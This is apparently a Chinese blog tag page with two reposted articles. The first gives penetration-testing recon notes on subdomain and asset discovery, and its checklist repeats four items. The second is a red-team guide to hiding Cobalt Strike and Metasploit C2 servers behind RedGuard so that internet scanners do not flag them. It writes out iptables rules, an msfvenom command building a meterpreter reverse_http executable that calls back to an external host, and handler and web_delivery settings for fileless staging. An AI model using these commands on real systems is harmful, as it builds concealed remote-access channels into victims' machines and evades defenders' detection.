标签 空间搜索引擎 下的文章

渗透测试资产搜集

渗透的本质就是信息收集,目的是尽可能全面的描绘目标资产的全貌,包括所有域名、子域名、IP 地址、开放端口及关联的公司信息,为后续漏洞探测提供基础。

域名及子域名搜集(深度和广度)

拿 baidu.com 举例,我们的目的是找到所有和目标主域名关联的二级,三级甚至四级域名:www.baidu.com,one.two.baidu.com 等

被动查询(利用公共数据库)

常用的在线查询网站

我个人常用 crt.sh

  • 特点:这是最老牌、最著名、也是最常用的 CT 日志搜索引擎之一。它汇总了来自多个 CT 日志的数据,查询结果非常全面。
  • 用法:输入域名,例如 %baidu.com (使用百分号 % 可以进行通配符搜索,以匹配所有子域名)

自动化工具

个人常用的

  • OneForAll
  • 特点:一个功能强大的综合子域名收集工具,它内置了对 crt.sh 、Censys 等多个 CT 日志源的查询模块。

还有些常见的空间搜索引擎:fofa,shodan,censys。 常用的为 fofa`,作为国内最老牌的空间搜索引擎,FOFA 的主要优势在于对中文和国内资产的覆盖度高,支持多维度搜索

主动探测

子域名爆破

关键要素:高质量字典

在没经过目标产商的允许擅自爆破属于违法行为!此教程仅作学习分享交流!

暴力破解的成败很大程度上取决于使用的字典(Wordlist)。渗透测试人员通常会使用的字典包括:

  • 通用字典 (General Wordlists):如 SecLists 中的 DNS 目录,包含常见的 mail , dev , test ,api , admin , vpn 等。
  • 企业定制字典:结合目标公司业务、员工姓名、产品名称、城市名称等自定义生成的字典。
  • 大型综合字典:通过爬虫、CT 日志、公共数据等方式汇集的大型子域名列表。

顶级域名的收集

除了常见的子域名收集姿势,还有顶级域名的收集,例如像 google,星巴克这样的大厂,它们的资产遍布全球,也就是说它有可能并不会告诉你一个确切的域名范围。

被动收集

搜索域名购买(任意一个都行),这里拿 google 举例


发现以下都被注册,再对这些域名进行子域名收集,这样的你的攻击面就比先前广了许多。

代码与页面信息泄露

这一阶段的目标是深入分析目标网站的代码和公开配置,以发现隐藏的 API 端点、敏感文件、内部注释和不应公开的路径。

前端代码分析

现代 Web 应用大量依赖前端 JavaScript (JS) 代码与后端 API 通信。JS 文件中经常硬编码或逻辑性地包含大量敏感信息。
核心关注点:

  1. API 接口路径:发现所有前端调用的 API 端点,例如 /api/v1/user/info 。
  2. 敏感字符串:搜索 token 、 secret 、 key 、 password 、 admin 等关键词。
  3. 子域名 / 内部域名:JS 文件中可能硬编码了开发环境或测试环境的域名(如 dev.corp.com ),或
    调用的第三方服务域名。
  4. 云服务凭证:寻找 AWS S3 bucket 名称、Google Cloud 或 Azure 存储服务的 URL 等。
  5. API 接口路径:发现所有前端调用的 API 端点,例如 /api/v1/user/info 。
  6. 敏感字符串:搜索 token 、 secret 、 key 、 password 、 admin 等关键词。
  7. 子域名 / 内部域名:JS 文件中可能硬编码了开发环境或测试环境的域名(如 dev.corp.com ),或
    调用的第三方服务域名。
  8. 云服务凭证:寻找 AWS S3 bucket 名称、Google Cloud 或 Azure 存储服务的 URL 等。

公开文件和配置检查

部分系统默认或管理员疏忽,会导致一些重要的配置或文件被公开访问。
核心检查清单:

  • Dirb / Dirbuster / Gobuster:这些目录爆破工具的字典中通常会包含上述常见的敏感配置文件路径,能够批量扫描并检测这些文件的存在性。
  • 手动浏览器访问:直接在目标域名后拼接 /robots.txt 和 /sitemap.xml 进行检查。

笔记写的有点潦草,希望各位佬友担待一下 ,如果该笔记有什么问题或者什么可以优化的地方,希望佬能在下面回复,我会认真看的


📌 转载信息
原作者:
useruy
转载时间:
2026/1/6 11:41:29

简介

前几天发现自己的服务器被fofa和微步情报标记为了cobaltstrike服务器,由于以前使用的版本没有对相应的特征做修改,导致被空间搜索引擎标记,刚好看到风起在朋友圈发布了RedGuard,于是赶紧试试鲜。
RedGuard由风起大佬编写的一款c2前置流量控制工具,可以帮助红队更好的隐藏c2基础设施,且目前还在更新和完善之中,在写这篇文章之后又进行了2次更新,优化和增加了一些新功能。
github地址

使用

第一次运行会在用户目录生成**.RedGuard_CobaltStrike.ini文件,编辑此文件对其进行配置,当然也支持参数进行热配置。

重点关注3个配置
1.PORT_HTTPS
2.PORT_HTTP
3.HostTarget
如上图,当前配置的意思是将Port_http的80端口绑定到本机127.0.0.1的8080端口,当有请求访问服务器的80端口,RedGuard会对请求特征做判断,当请求不符合规则(及host头不是360.net,这个可以随意设置),请求会被重定向到https://360.net,否则请求会被转发到cs的监听端口8080端口。请求会不会被重定向取决于DROP参数,如DORP参数设置为true将直接丢弃请求包。

同理,443端口被绑定到本机127.0.0.1的8443端口,当请求不符合规则时将请求重定向到https://360.net,当host头为360.com时将请求转发到cs的8443监听端口,主要取决于你cs的监听器是http还是https。

更多设置,如过滤上线ip、上线时间、上线省份请参考作者官方文档RedGuard文档
当然,这种场景适合将反代和cs服务器建在同一台机器上,比较节省资源,配合iptables可防止网络空间搜索引擎将你的服务器标记。
CS
启动RedGuard

sudo ./RedGuard_64

cs新建监听,c2端口设置为RedGaurd的反代端口,bind设置为cs的监听端口,注意host header可以随意设置,但一定要和配置文件里的一致。

再配置IPtables,只允许127.0.0.1访问本机的8443端口

iptables -I INPUT -p tcp --dport 8443 -j DROP #丢弃所有访问8443端口的包
iptables -I INPUT -p tcp -s 127.0.0.1 --dport 8443 -j ACCEPT #只允许127.0.0.1访问本机的8443端口

这样就可以正常上线了
还有一种就是拿一台单独的服务器做反代服务器,另一台服务器做真正的cs服务器,只需简单修改配置文件即可

这里将192.168.1.8用作反代服务器,192.168.1.7作为真正的cs服务器,HosTtarget填写cs服务器的地址192.168.1.7
新建cs监听,填写相应端口。

在cs服务器配置防火墙,只允许反向代理服务器来访问cs的监听端口

iptables -I INPUT -p tcp --dport 8443 -j DROP 
iptables -I INPUT -p tcp -s 192.168.1.8 --dport 8443 -j ACCEPT 

MSF

最简单的直接生成载荷

msfvenom -p windows/x64/meterpreter/reverse_http  LHOST=10.197.10.131 LPORT=80  HttpHostHeader=360.net -f exe -o test.exe

建立监听和设置参数,这里反代端口为80端口,80端口收到请求且符合规则后将其转发到本地的8080端口

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8080
 
set OverrideLHOST 10.197.10.131 
set overrideLPORT 80
set overriderequesthost true
set httphostheader 360.net 

run

配置防火墙

iptables -I INPUT -p tcp --dport 8080 -j DROP 
iptables -I INPUT -p tcp -s 127.0.0.1 --dport 8080 -j ACCEPT


在能执行命令的情况下,想方便点使用无文件落地的方式

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_http
set lhost 192.168.1.8
set lport 80 #端口设置为反向代理端口
set srvport 8082 #用于下载stage
set httphostheader 360.net
set OverrideLhOST 192.168.1.8
set overrideLpoRT 80
set overriderequesthost true
set DisablePayloadHandler true #关闭监听
run

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_http
set lhost 127.0.0.1
set lport 8080
set httphostheader 360.net
set OverrideLhOST 192.168.1.8
set overrideLpoRT 80
set overriderequesthost true
run

防火墙

iptables -I INPUT -p tcp --dport 8080 -j DROP 
iptables -I INPUT -p tcp -s 127.0.0.1 --dport 8080 -j ACCEPT

成功上线